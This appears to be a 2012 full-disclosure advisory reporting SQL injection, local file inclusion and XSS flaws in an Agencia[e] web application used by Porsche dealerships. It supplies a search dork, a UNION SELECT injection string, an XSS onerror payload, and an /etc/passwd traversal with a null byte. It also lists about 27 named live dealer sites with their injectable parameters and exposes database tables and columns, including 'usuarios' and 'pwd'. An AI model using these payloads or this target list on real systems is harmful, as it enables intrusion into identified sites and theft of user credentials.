Agencia e XSS / LFI / SQL Injection

2012-11-19 / 2012-11-20
Credit: Ur0b0r0x
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
CWE-98
Dork: intext: inurl:eventos_mas.php?ideve=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # Line: GreyHat # Exploit Title: Agencia[e] - SQL Injection / LFI / XSS Vulnerabilities # Dork: intext: inurl:eventos_mas.php?ideve= # Date: 16/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.agenciae.tv/ # Vendor Name: Agencia[e] # Tested On: Backtrack R3 / Linux Mint # Type: php # Info: Offical Center Porsche In Spain ------------------- Agreement -------------------- [12/11/2012] - Vulnerability discovered [15/11/2012] - Vendor notified Dont responsed [16/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/eventos_mas.php?ideve= < Sql Vulnerability Path > http://site.com/eventos_mas.php?ideve= < LFi Vulnerability Path > http://site.com/eventos_mas.php?ideve= < XSS Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4--+ # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");> # Exploit/Comand/Lfi=> /../../../../../../../etc/passwd%00/../../../ # Payload/Comand/Sql=> table_schema=00x5E6536C65716672756732423423 / table_name=0x44F6277C616670x5E6536C65756546269 # Demo_Xss_Sql_Vulnerabilities http://www.porsche-valencia.com/eventos_mas.php?ideve=14' http://www.porsche-madridoeste.com/eventos_mas.php?ideve=201' http://www.porsche-barcelona.com/eventos_mas.php?ideve=237' http://www.porsche-alicante.com/eventos_mas.php?ideve=184' http://www.porsche-pamplona.com/eventos_mas.php?ideve=351' http://www.porsche-bilbao.com/eventos_mas.php?ideve=353' http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=356' http://www.porsche-zaragoza.com/eventos_mas.php?ideve=105' http://www.porsche-murcia.com/eventos_mas.php?ideve=474' http://www.porsche-malaga.com/eventos_mas.php?ideve=436' http://www.porsche-castellon.com/eventos_mas.php?ideve=291' http://www.porsche-marbella.com/eventos_mas.php?ideve=160' http://www.porsche-canarias.com/eventos_mas.php?ideve=182' http://www.porsche-madridnorte.com/eventos_mas.php?ideve=175' http://porsche-baleares.com/eventos_mas.php?ideve=73' http://porsche-asturias.com/eventos_mas.php?ideve=418' http://www.porsche-sevilla.com/eventos_mas.php?ideve=443' http://www.porsche-acoruna.com/eventos_mas.php?ideve=424' http://www.centrosporsche.com/centros/eventos_mas.php?ideve=51' http://porsche-valladolid.com/eventos_mas.php?ideve=59' http://www.porsche-pamplona.com/eventos_mas.php?ideve=53' http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=288' http://www.porsche-tenerife.com/eventos_mas.php?ideve=9' http://www.porsche-braga.com/eventos_mas.php?ideve=243' http://www.porsche-faro.com/eventos_mas.php?ideve=314' http://www.porsche-lisboa.com/eventos_mas.php?ideve=219' http://www.porsche-leiria.com/eventos_mas.php?ideve=220' # The Same Tables And Columns All Site Vulnerability +----------+ | control | | eventos | | noticias | | usuarios | +----------+ +---------+ | Column | +---------+ | alias | | id | | nombre | | pwd | | sid | | url | | usuario | +---------+

References:

http://www.agenciae.tv/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top